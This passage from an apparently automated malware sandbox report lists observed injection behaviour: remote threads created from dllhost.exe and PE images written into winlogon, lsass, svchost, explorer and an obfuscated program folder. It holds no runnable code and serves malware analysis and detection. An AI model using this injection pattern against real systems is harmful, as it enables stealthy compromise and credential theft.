                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28721BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6E21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8F21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22921BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28B21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26421BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15721BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AD21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6521BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A021BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B221BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28721BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12C21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DA21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6B21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2C421BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 24C21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A521BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9C21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29621BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2C121BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D821BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6A21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2ED21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8021BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BC21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A021BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A021BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25021BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AE21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10121BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DF21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 24821BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11021BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A021BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2CD21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22C21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12621BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9C21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8521BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: ED21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13621BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2BB21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8921BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12121BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26321BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25521BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9E21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 24021BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 20E21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10221BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14E21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11421BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BB21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13D21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F721BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe EIP: 74621BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\wbem\WMIADAP.exe EIP: 75172A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E521BFJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E858950000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 140ADFC0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 195DD590000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1160CA30000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 257E1070000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2652E0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 254A27C0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24B87DA0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 205FB3C0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A205670000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18EC1F30000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26238950000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2786E560000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1611FF70000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27C0F350000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B279570000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E70A460000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22D13110000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22C8C580000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2825F1D0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20BAEC90000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C782530000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: A60000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24066EB0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 181CEDB0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A142790000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 195B6F30000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DCC0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DBF9DA0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A239D90000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17CFA390000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FB7270000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF53B50000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 164E88A0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25177B50000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28D5D340000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 24EB5E10000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F153C20000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D241D40000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16FADAD0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 20E03070000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15204DB0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 3200000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 175C5280000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22EF1B30000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34B0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 261DE4D0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74470000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8A0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 226D8930000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13E5E930000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F843DC0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28AF9060000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27234C50000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28543540000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 2B684340000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 21039380000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\cscript.exe base: 930000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 114A6AD0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 250E2CD0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 34C0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1DCBB740000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1190000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 6D0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1570000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2CF0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2A40000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 3000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1060000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1590000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: C20000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 8C0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2E00000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 9B0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 7B0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2870000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 6E0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 8F0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2290000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 28B0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2640000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1570000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2AD0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 650000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2A00000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 9D0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2B20000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2870000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 12C0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2DA0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 6B0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2C40000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 24C0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2A50000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 9C0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2960000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2C10000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: D80000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 6A0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2ED0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 800000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: BC0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: A00000 value starts with: 4D5AJump to behavior
